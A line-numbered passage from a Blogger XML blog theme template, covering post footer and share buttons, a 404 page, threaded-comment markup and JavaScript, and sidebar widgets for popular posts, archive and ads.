3604 <div id='meta-post'>
3605 <i class='fa fa-calendar-o'/>
3606<abbr class='published timeago' expr:title='data:post.timestampISO8601'><data:post.timestamp/></abbr>
3607<a class='comments-link' expr:href='data:post.addCommentUrl'><i class='fa fa-heart-o'/> <span><b:if cond='data:post.numComments == 0'><b>0</b> <b:else/><b:if cond='data:post.numComments == 1'><b>1 </b> <b:else/> <data:post.numComments/></b:if></b:if></span></a>
3608</div>
3609 <div style='clear: both;'/>
3610 </div>
3611 <b:else/>
3612 <div class='post-body entry-content' expr:id='"post-body-" + data:post.id' itemprop='articleBody'>
3613 <meta expr:content='data:post.snippet' name='twitter:description'/>
3614 <data:post.body/>
3615 </div>
3616 </b:if>
3617 <b:else/>
3618 <div class='post-body entry-content' expr:id='"post-body-" + data:post.id' itemprop='articleBody'>
3619 <meta expr:content='data:post.snippet' name='twitter:description'/>
3620 <data:post.body/>
3621 </div>
3622 </b:if>
3623 </article>
3624
3625
3626
3627 <div class='post-footer'>
3628<b:if cond='data:blog.pageType == "item"'>
3629<div class='share-box'>
3630 <span class='post-labels'>
3631<span class='label-title'>Tags</span>
3632 <b:if cond='data:post.labels'>
3633 <b:loop index='x' values='data:post.labels' var='label'>
3634
3635 <b:if cond='data:x==0'> <a expr:href='data:label.url + "?max-results=5"' rel='tag nofollow'># <data:label.name/></a></b:if>
3636 <b:if cond='data:x==1'> <a expr:href='data:label.url + "?max-results=5"' rel='tag nofollow'># <data:label.name/></a></b:if>
3637
3638 </b:loop>
3639 </b:if>
3640 </span>
3641
3642 <div class='share-art'>
3643<a class='fac-art' expr:href='"http://www.facebook.com/sharer.php?u=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-facebook'/></a>
3644
3645<a class='twi-art' expr:href='"http://twitter.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-twitter'/></a>
3646
3647<a class='goo-art' expr:href='"https://plus.google.com/share?url=" + data:post.url + "&title=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-google-plus'/></a>
3648
3649<a class='pin-art' expr:href='"http://pinterest.com/pin/create/button/?url=" + data:post.url + "&media=" + data:post.firstImageUrl + "&description=" + data:post.snippet' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-pinterest'/></a>
3650
3651<a class='lin-art' expr:href='"http://www.linkedin.com/shareArticle?url=" + data:post.url + "&title="+ data:post.title' onclick='window.open(this.href, 'windowName', 'width=600, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow' target='_blank'><i class='fa fa-linkedin-square'/></a>
3652
3653<whatsapp expr:href='data:post.url' expr:text='data:post.title'/>
3654<a class='wat-art' expr:href='"whatsapp://send?text=" + data:post.title + " >> " + data:post.url' rel='nofollow' target='_blank'><i class='fa fa-whatsapp'/></a>
3655
3656<a class='print-art' onClick='window.print()' rel='nofollow' style='cursor:pointer'><i class='fa fa-print'/></a>
3657
3658</div>
3659 </div>
3660 <div style='clear:both'/>
3661<div id='related-posts'>
3662 <b:if cond='data:post.labels'>
3663 <b:loop values='data:post.labels' var='label'>
3664 <b:if cond='data:label.isLast == "true"'>
3665 <data:label.name/>
3666 </b:if>
3667 </b:loop>
3668 </b:if>
3669 </div>
3670 <div style='clear:both'/>
3671<div class='post-pager' id='post-pager'>
3672 <b:if cond='data:newerPageUrl'>
3673 <span id='blog-pager-newer-link'>
3674 <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + "_blog-pager-newer-link"' expr:title='data:newerPageTitle'/>
3675 </span>
3676 </b:if>
3677
3678 <b:if cond='data:olderPageUrl'>
3679 <span id='blog-pager-older-link'>
3680 <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' expr:title='data:olderPageTitle'/>
3681 </span>
3682 </b:if>
3683
3684 </div>
3685 </b:if>
3686 <div class='post-footer-line post-footer-line-1'>
3687 <span class='post-author vcard'>
3688 <b:if cond='data:top.showAuthor'>
3689 <data:top.authorLabel/>
3690 <b:if cond='data:post.authorProfileUrl'>
3691 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3692 <meta expr:content='data:post.authorProfileUrl' itemprop='url'/>
3693 <a class='g-profile' expr:href='data:post.authorProfileUrl' rel='author' title='author profile'>
3694 <span itemprop='name'><data:post.author/></span>
3695 </a>
3696 </span>
3697 <b:else/>
3698 <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3699 <span itemprop='name'><data:post.author/></span>
3700 </span>
3701 </b:if>
3702 </b:if>
3703 </span>
3704
3705 <span class='post-timestamp'>
3706 <b:if cond='data:top.showTimestamp'>
3707 <data:top.timestampLabel/>
3708 <b:if cond='data:post.url'>
3709 <meta expr:content='data:post.canonicalUrl' itemprop='url'/>
3710 <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'><abbr class='published' expr:title='data:post.timestampISO8601' itemprop='datePublished'><data:post.timestamp/></abbr></a>
3711 </b:if>
3712 </b:if>
3713 </span>
3714
3715 <span class='reaction-buttons'>
3716 <b:if cond='data:top.showReactions'>
3717 <table border='0' cellpadding='0' cellspacing='0' width='100%'><tr>
3718 <td class='reactions-label-cell' nowrap='nowrap' valign='top' width='1%'>
3719 <span class='reactions-label'>
3720 <data:top.reactionsLabel/></span> </td>
3721 <td><iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/></td>
3722 </tr></table>
3723 </b:if>
3724 </span>
3725
3726 <span class='post-comment-link'>
3727 <b:include cond='data:blog.pageType not in {"item","static_page"} and data:post.allowComments' data='post' name='comment_count_picker'/>
3728 </span>
3729
3730 <!-- backlinks -->
3731 <span class='post-backlinks post-comment-link'>
3732 <b:if cond='data:blog.pageType not in {"item","static_page"} and data:post.showBacklinks'>
3733 <a class='comment-link' expr:href='data:post.url + "#links"'><data:top.backlinkLabel/></a>
3734 </b:if>
3735 </span>
3736
3737 <span class='post-icons'>
3738 <!-- email post links -->
3739 <b:if cond='data:post.emailPostUrl'>
3740 <span class='item-action'>
3741 <a expr:href='data:post.emailPostUrl' expr:title='data:top.emailPostMsg'>
3742 <img alt='' class='icon-action' height='13' src='//img1.blogblog.com/img/icon18_email.gif' width='18'/>
3743 </a>
3744 </span>
3745 </b:if>
3746
3747 <!-- quickedit pencil -->
3748 <b:include data='post' name='postQuickEdit'/>
3749 </span>
3750
3751 <!-- share buttons -->
3752 <div class='post-share-buttons goog-inline-block'>
3753 <b:include cond='data:post.sharePostUrl' data='post' name='shareButtons'/>
3754 </div>
3755
3756 </div>
3757
3758 <div class='post-footer-line post-footer-line-2'>
3759 <span class='post-labels'>
3760 <b:if cond='data:post.labels'>
3761 <data:postLabelsLabel/>
3762 <b:loop values='data:post.labels' var='label'>
3763 <a expr:href='data:label.url' rel='tag'><data:label.name/></a><b:if cond='not data:label.isLast'>,</b:if>
3764 </b:loop>
3765 </b:if>
3766 </span>
3767 </div>
3768
3769 <div class='post-footer-line post-footer-line-3'>
3770 <span class='post-location'>
3771 <b:if cond='data:top.showLocation'>
3772 <b:if cond='data:post.location'>
3773 <data:postLocationLabel/>
3774 <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
3775 </b:if>
3776 </b:if>
3777 </span>
3778 </div>
3779 <b:if cond='data:post.authorAboutMe'>
3780 <div class='author-profile' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'>
3781 <b:if cond='data:post.authorPhoto.url'>
3782 <img expr:src='data:post.authorPhoto.url' itemprop='image' width='50px'/>
3783 </b:if>
3784 <div>
3785 <a class='g-profile' expr:href='data:post.authorProfileUrl' itemprop='url' rel='author' title='author profile'>
3786 <span itemprop='name'><data:post.author/></span>
3787 </a>
3788 </div>
3789 <span itemprop='description'><data:post.authorAboutMe/></span>
3790 </div>
3791 </b:if>
3792 </div>
3793 <b:if cond='data:blog.pageType == "item"'>
3794 </div>
3795 </b:if>
3796 </div>
3797</b:includable>
3798 <b:includable id='postQuickEdit' var='post'>
3799 <b:if cond='data:post.editUrl'>
3800 <span expr:class='"item-control " + data:post.adminClass'>
3801 <a expr:href='data:post.editUrl' expr:title='data:top.editPostMsg'>
3802 <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
3803 </a>
3804 </span>
3805 </b:if>
3806</b:includable>
3807 <b:includable id='shareButtons' var='post'>
3808 <b:if cond='data:top.showEmailButton'><a class='goog-inline-block share-button sb-email' expr:href='data:post.sharePostUrl + "&target=email"' expr:title='data:top.emailThisMsg' target='_blank'><span class='share-button-link-text'><data:top.emailThisMsg/></span></a></b:if><b:if cond='data:top.showBlogThisButton'><a class='goog-inline-block share-button sb-blog' expr:href='data:post.sharePostUrl + "&target=blog"' expr:onclick='"window.open(this.href, \"_blank\", \"height=270,width=475\"); return false;"' expr:title='data:top.blogThisMsg' target='_blank'><span class='share-button-link-text'><data:top.blogThisMsg/></span></a></b:if><b:if cond='data:top.showTwitterButton'><a class='goog-inline-block share-button sb-twitter' expr:href='data:post.sharePostUrl + "&target=twitter"' expr:title='data:top.shareToTwitterMsg' target='_blank'><span class='share-button-link-text'><data:top.shareToTwitterMsg/></span></a></b:if><b:if cond='data:top.showFacebookButton'><a class='goog-inline-block share-button sb-facebook' expr:href='data:post.sharePostUrl + "&target=facebook"' expr:onclick='"window.open(this.href, \"_blank\", \"height=430,width=640\"); return false;"' expr:title='data:top.shareToFacebookMsg' target='_blank'><span class='share-button-link-text'><data:top.shareToFacebookMsg/></span></a></b:if><b:if cond='data:top.showPinterestButton'><a class='goog-inline-block share-button sb-pinterest' expr:href='data:post.sharePostUrl + "&target=pinterest"' expr:title='data:top.shareToPinterestMsg' target='_blank'><span class='share-button-link-text'><data:top.shareToPinterestMsg/></span></a></b:if><b:if cond='data:top.showPlusOne'><div class='goog-inline-block google-plus-share-container'><data:post.googlePlusShareTag/></div></b:if>
3809</b:includable>
3810 <b:includable id='status-message'>
3811 <b:if cond='data:navMessage'>
3812 <div class='status-msg-wrap'>
3813 <div class='status-msg-body'>
3814 <data:navMessage/>
3815 </div>
3816 <div class='status-msg-border'>
3817 <div class='status-msg-bg'>
3818 <div class='status-msg-hidden'><data:navMessage/></div>
3819 </div>
3820 </div>
3821 </div>
3822 <div style='clear: both;'/>
3823<b:if cond='data:blog.pageType == "error_page"'>
3824 <div class='post-404'>
3825<div class='actions-404'>
3826<div class='ops-404'><span>Oops;</span> Sorry, but the page you were trying to view does not exist.
3827 </div>
3828<div class='title-404'>404</div>
3829<div class='link-404'>
3830<a href='/'><i class='fa fa-car'/>
3831<trans>Back to Home</trans></a>
3832</div></div>
3833</div>
3834<style>
3835.post-404 {
3836 padding-top: 40px;
3837 padding-bottom: 60px;
3838}
3839.actions-404 {
3840 width: 100%;
3841 float: right;
3842 text-align: center;
3843}
3844.ops-404 {
3845 width: 50%;
3846 margin: 0 auto;
3847 font-size: 26px;
3848 font-weight: 400;
3849font-family: 'PT Sans', sans-serif;
3850}
3851.ops-404 span {
3852 font-weight: 700;
3853}
3854.title-404 {
3855 font-size: 200px;
3856 font-weight: 700;
3857 line-height: 1.1;
3858 color:$maincolor;
3859}
3860.link-404 {
3861 font-size: 18px;
3862 padding-top: 20px;
3863 padding-bottom: 50px;
3864}
3865#blog-pager, #sidebar-wrapper,.status-msg-wrap {
3866 display: none;
3867}
3868.status-msg-border {
3869 border: 0 !important;
3870 }
3871
3872 .status-msg-bg {
3873 background-color: #fff;
3874 }
3875#main-wrapper {
3876width: 100%;
3877 max-width: 100%;
3878}
3879#main-post-sec {
3880 max-width: 100%;
3881}
3882#mini-sidebar-wrapper {
3883 display: none;
3884}
3885</style>
3886 </b:if>
3887 </b:if>
3888</b:includable>
3889 <b:includable id='threaded-comment-form' var='post'>
3890 <div class='comment-form'>
3891 <a name='comment-form'/>
3892 <b:if cond='data:mobile'>
3893 <p><data:blogCommentMessage/></p>
3894 <data:blogTeamBlogMessage/>
3895 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
3896 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' style='display: none' width='100%'/>
3897 <b:else/>
3898 <p><data:blogCommentMessage/></p>
3899 <data:blogTeamBlogMessage/>
3900 <a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/>
3901 <iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
3902 </b:if>
3903 <data:post.cmtfpIframe/>
3904 <script type='text/javascript'>
3905 BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>');
3906 </script>
3907 </div>
3908</b:includable>
3909 <b:includable id='threaded_comment_js' var='post'>
3910 <script async='async' expr:src='data:post.commentSrc' type='text/javascript'/>
3911
3912 <script type='text/javascript'>
3913 (function() {
3914 var items = <data:post.commentJso/>;
3915 var msgs = <data:post.commentMsgs/>;
3916 var config = <data:post.commentConfig/>;
3917
3918// <![CDATA[
3919 var cursor = null;
3920 if (items && items.length > 0) {
3921 cursor = parseInt(items[items.length - 1].timestamp) + 1;
3922 }
3923
3924 var bodyFromEntry = function(entry) {
3925 if (entry.gd$extendedProperty) {
3926 for (var k in entry.gd$extendedProperty) {
3927 if (entry.gd$extendedProperty[k].name == 'blogger.contentRemoved') {
3928 return '<span class="deleted-comment">' + entry.content.$t + '</span>';
3929 }
3930 }
3931 }
3932 return entry.content.$t;
3933 }
3934
3935 var parse = function(data) {
3936 cursor = null;
3937 var comments = [];
3938 if (data && data.feed && data.feed.entry) {
3939 for (var i = 0, entry; entry = data.feed.entry[i]; i++) {
3940 var comment = {};
3941 // comment ID, parsed out of the original id format
3942 var id = /blog-(\d+).post-(\d+)/.exec(entry.id.$t);
3943 comment.id = id ? id[2] : null;
3944 comment.body = bodyFromEntry(entry);
3945 comment.timestamp = Date.parse(entry.published.$t) + '';
3946 if (entry.author && entry.author.constructor === Array) {
3947 var auth = entry.author[0];
3948 if (auth) {
3949 comment.author = {
3950 name: (auth.name ? auth.name.$t : undefined),
3951 profileUrl: (auth.uri ? auth.uri.$t : undefined),
3952 avatarUrl: (auth.gd$image ? auth.gd$image.src : undefined)
3953 };
3954 }
3955 }
3956 if (entry.link) {
3957 if (entry.link[2]) {
3958 comment.link = comment.permalink = entry.link[2].href;
3959 }
3960 if (entry.link[3]) {
3961 var pid = /.*comments\/default\/(\d+)\?.*/.exec(entry.link[3].href);
3962 if (pid && pid[1]) {
3963 comment.parentId = pid[1];
3964 }
3965 }
3966 }
3967 comment.deleteclass = 'item-control blog-admin';
3968 if (entry.gd$extendedProperty) {
3969 for (var k in entry.gd$extendedProperty) {
3970 if (entry.gd$extendedProperty[k].name == 'blogger.itemClass') {
3971 comment.deleteclass += ' ' + entry.gd$extendedProperty[k].value;
3972 } else if (entry.gd$extendedProperty[k].name == 'blogger.displayTime') {
3973 comment.displayTime = entry.gd$extendedProperty[k].value;
3974 }
3975 }
3976 }
3977 comments.push(comment);
3978 }
3979 }
3980 return comments;
3981 };
3982
3983 var paginator = function(callback) {
3984 if (hasMore()) {
3985 var url = config.feed + '?alt=json&v=2&orderby=published&reverse=false&max-results=50';
3986 if (cursor) {
3987 url += '&published-min=' + new Date(cursor).toISOString();
3988 }
3989 window.bloggercomments = function(data) {
3990 var parsed = parse(data);
3991 cursor = parsed.length < 50 ? null
3992 : parseInt(parsed[parsed.length - 1].timestamp) + 1
3993 callback(parsed);
3994 window.bloggercomments = null;
3995 }
3996 url += '&callback=bloggercomments';
3997 var script = document.createElement('script');
3998 script.type = 'text/javascript';
3999 script.src = url;
4000 document.getElementsByTagName('head')[0].appendChild(script);
4001 }
4002 };
4003 var hasMore = function() {
4004 return !!cursor;
4005 };
4006 var getMeta = function(key, comment) {
4007 if ('iswriter' == key) {
4008 var matches = !!comment.author
4009 && comment.author.name == config.authorName
4010 && comment.author.profileUrl == config.authorUrl;
4011 return matches ? 'true' : '';
4012 } else if ('deletelink' == key) {
4013 return config.baseUri + '/delete-comment.g?blogID='
4014 + config.blogId + '&postID=' + comment.id;
4015 } else if ('deleteclass' == key) {
4016 return comment.deleteclass;
4017 }
4018 return '';
4019 };
4020
4021 var replybox = null;
4022 var replyUrlParts = null;
4023 var replyParent = undefined;
4024
4025 var onReply = function(commentId, domId) {
4026 if (replybox == null) {
4027 // lazily cache replybox, and adjust to suit this style:
4028 replybox = document.getElementById('comment-editor');
4029 if (replybox != null) {
4030 replybox.height = '250px';
4031 replybox.style.display = 'block';
4032 replyUrlParts = replybox.src.split('#');
4033 }
4034 }
4035 if (replybox && (commentId !== replyParent)) {
4036 replybox.src = '';
4037 document.getElementById(domId).insertBefore(replybox, null);
4038 replybox.src = replyUrlParts[0]
4039 + (commentId ? '&parentID=' + commentId : '')
4040 + '#' + replyUrlParts[1];
4041 replyParent = commentId;
4042 }
4043 };
4044
4045 var hash = (window.location.hash || '#').substring(1);
4046 var startThread, targetComment;
4047 if (/^comment-form_/.test(hash)) {
4048 startThread = hash.substring('comment-form_'.length);
4049 } else if (/^c[0-9]+$/.test(hash)) {
4050 targetComment = hash.substring(1);
4051 }
4052
4053 // Configure commenting API:
4054 var configJso = {
4055 'maxDepth': config.maxThreadDepth
4056 };
4057 var provider = {
4058 'id': config.postId,
4059 'data': items,
4060 'loadNext': paginator,
4061 'hasMore': hasMore,
4062 'getMeta': getMeta,
4063 'onReply': onReply,
4064 'rendered': true,
4065 'initComment': targetComment,
4066 'initReplyThread': startThread,
4067 'config': configJso,
4068 'messages': msgs
4069 };
4070
4071 var render = function() {
4072 if (window.goog && window.goog.comments) {
4073 var holder = document.getElementById('comment-holder');
4074 window.goog.comments.render(holder, provider);
4075 }
4076 };
4077
4078 // render now, or queue to render when library loads:
4079 if (window.goog && window.goog.comments) {
4080 render();
4081 } else {
4082 window.goog = window.goog || {};
4083 window.goog.comments = window.goog.comments || {};
4084 window.goog.comments.loadQueue = window.goog.comments.loadQueue || [];
4085 window.goog.comments.loadQueue.push(render);
4086 }
4087 })();
4088// ]]>
4089 </script>
4090</b:includable>
4091 <b:includable id='threaded_comments' var='post'>
4092 <div class='comments' id='comments'>
4093 <a name='comments'/>
4094 <h4><data:post.commentLabelFull/>:</h4>
4095
4096 <div class='comments-content'>
4097 <b:include cond='data:post.embedCommentForm' data='post' name='threaded_comment_js'/>
4098 <div id='comment-holder'>
4099 <data:post.commentHtml/>
4100 </div>
4101 </div>
4102
4103 <p class='comment-footer'>
4104 <b:if cond='data:post.allowNewComments'>
4105 <b:include data='post' name='threaded-comment-form'/>
4106 <b:else/>
4107 <data:post.noNewCommentsText/>
4108 </b:if>
4109 </p>
4110
4111 <b:if cond='data:showCmtPopup'>
4112 <div id='comment-popup'>
4113 <iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
4114 </iframe>
4115 </div>
4116 </b:if>
4117
4118 <div id='backlinks-container'>
4119 <div expr:id='data:widget.instanceId + "_backlinks-container"'>
4120 <b:include cond='data:post.showBacklinks' data='post' name='backlinks'/>
4121 </div>
4122 </div>
4123 </div>
4124</b:includable>
4125 </b:widget>
4126 </b:section>
4127 </div>
4128
4129 <div id='sidebar-wrapper'>
4130 <b:section class='sidebar' id='sidebar1' preferred='yes'>
4131 <b:widget id='HTML2' locked='false' title='Follow Us' type='HTML' version='1'>
4132 <b:widget-settings>
4133 <b:widget-setting name='content'><div class="kt-social-buttons-widget"><ul class="sidebar-social clearfix"><li><a href="#!" class="social-btn-twitter">Follow on Twitter <i class="fa fa-twitter"></i> </a></li><li><a href="#!" class="social-btn-facebook">Like on Facebook <i class="fa fa-facebook"></i> </a></li><li><a href="#!" class="social-btn-youtube">Subscribe on Youtube <i class="fa fa-youtube"></i> </a></li><li><a href="#!" class="social-btn-instagram">Follow on Instagram <i class="fa fa-instagram"></i> </a></li></ul></div>
4134<style>
4135.kt-social-buttons-widget ul {
4136list-style: none;
4137padding-left: 0;
4138}
4139.kt-social-buttons-widget li a {
4140font-size: 10px;
4141text-transform: uppercase;
4142letter-spacing: 2px;
4143text-decoration: none;
4144display: block;
4145color: #0a0a0a;
4146padding: 10px 1px 10px 10px;
4147background:#f8f8f8;
4148}
4149.kt-social-buttons-widget ul li {
4150width: 100%;
4151margin-bottom: 10px;
4152}
4153.kt-social-buttons-widget li:hover a.social-btn-twitter {
4154background: #1da1f2;
4155color:#fff;
4156}
4157.kt-social-buttons-widget li a i {
4158float: right;
4159width: 35px;
4160height: 14px;
4161line-height: 14px;
4162text-align: ;
4163margin: 0;
4164padding: 0 0 0 10px;
4165font-size: 14px;
4166}
4167.kt-social-buttons-widget li a i {
4168border-left: 1px solid #666;
4169line-height: 14px;
4170}
4171.kt-social-buttons-widget li:hover a.social-btn-facebook {
4172background: #3b5998;
4173color:#fff;
4174}
4175.kt-social-buttons-widget li:hover a.social-btn-youtube {
4176background: #cd201f;
4177color:#fff;
4178}
4179.kt-social-buttons-widget li:hover a.social-btn-instagram {
4180background: #405de6;
4181color:#fff;
4182}
4183</style></b:widget-setting>
4184 </b:widget-settings>
4185 <b:includable id='main'>
4186 <!-- only display title if it's non-empty -->
4187 <b:if cond='data:title != ""'>
4188 <h2 class='title'><data:title/></h2>
4189 </b:if>
4190 <div class='widget-content'>
4191 <data:content/>
4192 </div>
4193<div style='clear: both;'/>
4194<!--b:include name='quickedit'/-->
4195
4196</b:includable>
4197 </b:widget>
4198 </b:section>
4199<div style='clear: both;'/>
4200<div class='sidetabs' id='sidetabs'>
4201 <ul class='menu-tab'>
4202 <li class='item-1'><a href='#tabside1'/></li>
4203 <li class='item-2'><a href='#tabside2'/></li>
4204 </ul>
4205 <b:section class='sidebar featured-widget' id='tabside1' maxwidgets='1' name='Tab 01' showaddelement='yes'>
4206 <b:widget id='PopularPosts1' locked='false' title='Popular' type='PopularPosts' version='1'>
4207 <b:widget-settings>
4208 <b:widget-setting name='numItemsToShow'>5</b:widget-setting>
4209 <b:widget-setting name='showThumbnails'>true</b:widget-setting>
4210 <b:widget-setting name='showSnippets'>true</b:widget-setting>
4211 <b:widget-setting name='timeRange'>LAST_YEAR</b:widget-setting>
4212 </b:widget-settings>
4213 <b:includable id='main'>
4214 <b:if cond='data:title != ""'><h2><data:title/></h2></b:if>
4215 <div class='widget-content popular-posts'>
4216 <ul>
4217 <b:loop values='data:posts' var='post'>
4218 <li>
4219 <b:if cond='!data:showThumbnails'>
4220 <b:if cond='!data:showSnippets'>
4221 <!-- (1) No snippet/thumbnail -->
4222 <a expr:href='data:post.href'><data:post.title/></a>
4223 <b:else/>
4224 <!-- (2) Show only snippets -->
4225 <div class='item-title'><a expr:href='data:post.href'><data:post.title/></a></div>
4226 <div class='item-snippet'><data:post.snippet/></div>
4227 </b:if>
4228 <b:else/>
4229 <!-- (3) Show only thumbnails or (4) Snippets and thumbnails. -->
4230 <div expr:class='data:showSnippets ? "item-content" : "item-thumbnail-only"'>
4231 <b:if cond='data:post.thumbnail'>
4232 <div class='item-thumbnail'>
4233 <a expr:href='data:post.href'>
4234 <img border='0' expr:alt='data:post.title' expr:height='data:thumbnailSize' expr:src='data:post.thumbnail' expr:width='data:thumbnailSize'/>
4235 </a>
4236 </div>
4237 </b:if>
4238 <div class='item-title'><a expr:href='data:post.href'><data:post.title/></a></div>
4239 <b:if cond='data:showSnippets'>
4240 <div class='item-snippet'><data:post.snippet/></div>
4241 </b:if>
4242 </div>
4243 <div style='clear: both;'/>
4244 </b:if>
4245 </li>
4246 </b:loop>
4247 </ul>
4248 <!--b:include name='quickedit'/-->
4249 </div>
4250 </b:includable>
4251 </b:widget>
4252 </b:section>
4253 <b:section class='sidebar featured-widget' id='tabside2' maxwidgets='1' name='Tab 02' showaddelement='yes'>
4254 <b:widget id='BlogArchive1' locked='false' title='Blog Archive' type='BlogArchive' version='1'>
4255 <b:widget-settings>
4256 <b:widget-setting name='showStyle'>HIERARCHY</b:widget-setting>
4257 <b:widget-setting name='yearPattern'>yyyy</b:widget-setting>
4258 <b:widget-setting name='showWeekEnd'>true</b:widget-setting>
4259 <b:widget-setting name='monthPattern'>MMMM</b:widget-setting>
4260 <b:widget-setting name='dayPattern'>MMM dd</b:widget-setting>
4261 <b:widget-setting name='weekPattern'>MM/dd</b:widget-setting>
4262 <b:widget-setting name='chronological'>false</b:widget-setting>
4263 <b:widget-setting name='showPosts'>true</b:widget-setting>
4264 <b:widget-setting name='frequency'>MONTHLY</b:widget-setting>
4265 </b:widget-settings>
4266 <b:includable id='main'>
4267 <b:if cond='data:title != ""'>
4268 <h2><data:title/></h2>
4269 </b:if>
4270 <div class='widget-content'>
4271 <div id='ArchiveList'>
4272 <div expr:id='data:widget.instanceId + "_ArchiveList"'>
4273 <b:include cond='data:style == "HIERARCHY"' data='data' name='interval'/>
4274 <b:include cond='data:style == "FLAT"' data='data' name='flat'/>
4275 <b:include cond='data:style == "MENU"' data='data' name='menu'/>
4276 </div>
4277 </div>
4278 <div style='clear: both;'/>
4279<!--b:include name='quickedit'/-->
4280 </div>
4281</b:includable>
4282 <b:includable id='flat' var='data'>
4283 <ul class='flat'>
4284 <b:loop values='data:data' var='i'>
4285 <li class='archivedate'>
4286 <a expr:href='data:i.url'><data:i.name/></a> (<data:i.post-count/>)
4287 </li>
4288 </b:loop>
4289 </ul>
4290</b:includable>
4291 <b:includable id='interval' var='intervalData'>
4292 <b:loop values='data:intervalData' var='interval'>
4293 <ul class='hierarchy'>
4294 <li expr:class='"archivedate " + data:interval.expclass'>
4295 <b:include cond='data:interval.toggleId' data='interval' name='toggle'/>
4296 <a class='post-count-link' expr:href='data:interval.url'>
4297 <data:interval.name/>
4298 </a>
4299 <span class='post-count' dir='ltr'>(<data:interval.post-count/>)</span>
4300 <b:include cond='data:interval.data' data='interval.data' name='interval'/>
4301 <b:include cond='data:interval.posts' data='interval.posts' name='posts'/>
4302 </li>
4303 </ul>
4304 </b:loop>
4305</b:includable>
4306 <b:includable id='menu' var='data'>
4307 <select expr:id='data:widget.instanceId + "_ArchiveMenu"'>
4308 <option value=''><data:title/></option>
4309 <b:loop values='data:data' var='i'>
4310 <option expr:value='data:i.url'><data:i.name/> (<data:i.post-count/>)</option>
4311 </b:loop>
4312 </select>
4313</b:includable>
4314 <b:includable id='posts' var='posts'>
4315 <ul class='posts'>
4316 <b:loop values='data:posts' var='post'>
4317 <li><a expr:href='data:post.url'><data:post.title/></a></li>
4318 </b:loop>
4319 </ul>
4320</b:includable>
4321 <b:includable id='toggle' var='interval'>
4322 <a class='toggle' href='javascript:void(0)'>
4323 <span expr:class='"zippy" + (data:interval.expclass == "expanded" ? " toggle-open" : "")'>
4324 <b:if cond='data:interval.expclass == "expanded"'>
4325 ▼ 
4326 <b:elseif cond='data:blog.languageDirection == "rtl"'/>
4327 ◄ 
4328 <b:else/>
4329 ► 
4330 </b:if>
4331 </span>
4332 </a>
4333</b:includable>
4334 </b:widget>
4335 </b:section>
4336 </div>
4337<div style='clear: both;'/>
4338<b:section class='sidebar' id='sidebar2' preferred='yes'>
4339 <b:widget id='HTML5' locked='false' title='Sponsor' type='HTML' version='1'>
4340 <b:widget-settings>
4341 <b:widget-setting name='content'><![CDATA[<center><a href="#"><img alt="ads" src="http://3.bp.blogspot.com/-uv5_KkS7oSM/Vib-kJkyWpI/AAAAAAAABag/Ntvn1QpneiI/s1600-r/ad4.png" /></a></center>]]></b:widget-setting>
4342 </b:widget-settings>
4343 <b:includable id='main'>
4344 <!-- only display title if it's non-empty -->
4345 <b:if cond='data:title != ""'>
4346 <h2 class='title'><data:title/></h2>
4347 </b:if>
4348 <div class='widget-content'>
4349 <data:content/>
4350 </div>
4351
4352 <div style='clear: both;'/>
4353<!--b:include name='quickedit'/-->
4354</b:includable>
4355 </b:widget>
4356 <b:widget id='HTML4' locked='false' title='Facebook' type='HTML' version='1'>
4357 <b:widget-settings>
4358 <b:widget-setting name='content'><![CDATA[<center><div class="fb-page" data-href="https://www.facebook.com/soratemplates/" data-width="360" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"></div></center>]]></b:widget-setting>
4359 </b:widget-settings>
4360 <b:includable id='main'>
4361 <!-- only display title if it's non-empty -->
4362 <b:if cond='data:title != ""'>
4363 <h2 class='title'><data:title/></h2>
4364 </b:if>
4365 <div class='widget-content'>
4366 <data:content/>
4367 </div>
4368
4369 <div style='clear: both;'/>
4370<!--b:include name='quickedit'/-->
4371</b:includable>
4372 </b:widget>
4373</b:section>
4374 </div>
4375 <div style='clear: both;'/>
4376 </div>
4377 <!-- end content-wrapper -->
4378<div id='ads-blog-bottom'>
4379 <b:section class='home-ad-bot' id='ads-home-bot' maxwidgets='1' name='Home ADS Bottom' showaddelement='yes'>
4380 <b:widget id='HTML119' locked='false' title='' type='HTML' version='1'>
4381 <b:widget-settings>
4382 <b:widget-setting name='content'><![CDATA[<center><img border="0" src="http://3.bp.blogspot.com/-KJs65c4Yuo0/VtaHPqLkrbI/AAAAAAAADLQ/xAqLxB0gJFw/s1600-r/ad728.gif" alt="Adbox" /></center>]]></b:widget-setting>
4383 </b:widget-settings>
